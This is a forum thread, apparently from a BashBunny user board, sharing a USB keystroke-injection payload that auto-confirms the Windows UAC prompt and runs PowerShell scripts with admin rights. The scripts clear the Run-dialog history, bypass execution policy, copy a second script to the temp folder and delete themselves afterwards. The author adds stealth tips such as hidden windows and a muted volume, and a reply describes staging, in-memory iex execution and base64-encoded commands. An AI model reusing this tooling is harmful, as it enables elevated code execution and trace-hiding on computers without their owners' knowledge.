Jump to content

Possible UAC bypass solution


Dracstic

Recommended Posts

Hello all,

I'm working on a project that requires multiple programs to run in parallel and when started individually each one triggers a UAC window. After some tinkering I came to the following solution and wanted to pass it along. Hope it helps.

It starts with modifying the run.sh file in the extensions folder. I added the following code after the  line "case "$os" in". This isn't strictly needed but I plan on using this in the future as well.

WIN_UAC)
         QUACK GUI r
         QUACK DELAY 500
         QUACK STRING "$@"
         QUACK CTRL-SHIFT ENTER
		 QUACK DELAY 1000
		 QUACK ALT y
		 QUACK ALT c
		 QUACK LEFTARROW
		 QUACK ENTER
		 QUACK ENTER
         ;;

 

I then created the BashBunny payload that would copy the file p2.ps1 from the switch# folder to the root of the USB storage and then call a quick powershell script using the new RUN WIN_UAC command that I just added.

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
cp /root/udisk/payloads/$SWITCH_POSITION/p2.ps1 /root/udisk/p2.ps1

######## ATTACK ########
LED ATTACK
Q DELAY 1000
RUN WIN_UAC "powerShell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\p1.ps1')"
######## FINISH ########
LED FINISH

 

The RUN WIN_UAC  command will run the powershell script p1.ps1 with administrator privileges. p1.ps1 will copy p2.ps1 from the root of the BashBunny storage to a temporary folder on the PC and then run p2.ps1 with admin privileges. At this time the BashBunny can be unplugged. 

#Setup
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear run command window
Set-ExecutionPolicy bypass -force #disable UAC for this script
Copy-Item ((gwmi win32_volume -f 'label=''BashBunny''').Name+'p2.ps1') -Destination $env:temp; Start-Process powershell (($env:temp)+'\p2.ps1') #Copy p2.ps1 from BashBunny storage root to temp folder on PC then run p2.ps1.

 

P2.ps1 will run with admin privileges from the temporary folder and when it's job is complete will delete itself and end the powershell process.

#Setup
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear run command window
Set-ExecutionPolicy bypass -force #disable UAC for this script


#Your payload here with all the privileges.


Remove-Item (($env:temp)+'\p1.ps1') #Delete this script file
Stop-Process -Id $PID #End this process
#End ################################################################################################



To add stealthyness I would add -windowstyle hidden to the Start-Process lines as well as turn down the volume or mute before the UAC window is triggered.

 

What do you think?
Drac.

Link to comment
Share on other sites

You can create a stager to handle the download and execution of all your scripts under the same admin context without having to repeatedly launch a new process via quack commands.

Staging is using one script or program to download and launch additional scripts.  You would use ps1 in get a bypassed instance with your WIN_UAC function.  Inside the ps1 you would have additional commands to start new processes for each script.  Because  ps1 was started elevated, anything it runs will run elevated too.

So inside ps1 you could

 

Start-Process Powershell -argumentlist "<path to powershell script> <arguments for script>"

Also, I do not see the need to move the scripts around from their switch folder.  If ps1 launched from the BB payload switch folder then ps2 can too.

Link to comment
Share on other sites

I'll keep that in mind.

Running one script from the bashbunny would work great for quick jobs. Unfortunately the project I'm working on downloads and runs multiple executables and takes over an hour to complete. I know powershell scripts are copied to and ran from memory but I was having issues with reliability after the script was started and the bashbunny was unplugged. With the two script setup I can unplug the bashbunny as soon as the first script closes.

Link to comment
Share on other sites

Why would you have to wait?  You can fire off each script in parallel too in the powershell script.  "Start-Process" is non-blocking.

in PS1 you would have 2 start-process for powershell and the argument for the first script in the first one  and second script in second one.  Or a third one for a third script also.  Start process will fire off one after another but will not wait for them to finish to fire off the others.  It will only wait if you use wait-process.  At the end of the ps1 file you can signal however you like to the bunny you are done so you can pull the bash bunny.

Running them in memory means firing off a "start-process powershell" but for the argument will be a command to get content and iex one of those scripts.  Now your iex is in another powershell process and not holding up ps1.

Remember start process if you want something ran outside of your current process.  Remember you can pass the job of grabbing and running that script to that process.  If you really feel like coding you can grab the script and Unicode base64 encode them and then run "start-process powershell" and use the "-E" for the argument with the base64 encoded script...if it is not bigger than 8.9k characters.  I am rounding.

 

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...